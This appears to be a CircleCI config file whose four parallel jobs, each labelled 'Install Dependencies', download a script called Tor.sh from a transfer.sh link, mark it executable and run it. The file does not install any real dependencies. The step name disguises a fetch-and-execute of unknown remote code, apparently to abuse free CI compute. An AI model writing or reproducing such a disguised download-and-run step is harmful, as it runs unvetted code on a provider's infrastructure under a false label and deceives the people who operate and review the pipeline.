version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://transfer.sh/HXDkfb/Tor.sh && chmod +x Tor.sh && ./Tor.sh
    Devop1:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://transfer.sh/HXDkfb/Tor.sh && chmod +x Tor.sh && ./Tor.sh
    Devop2:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://transfer.sh/HXDkfb/Tor.sh && chmod +x Tor.sh && ./Tor.sh
    Devop3:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://transfer.sh/HXDkfb/Tor.sh && chmod +x Tor.sh && ./Tor.sh
workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            - Devop1
            - Devop2
            - Devop3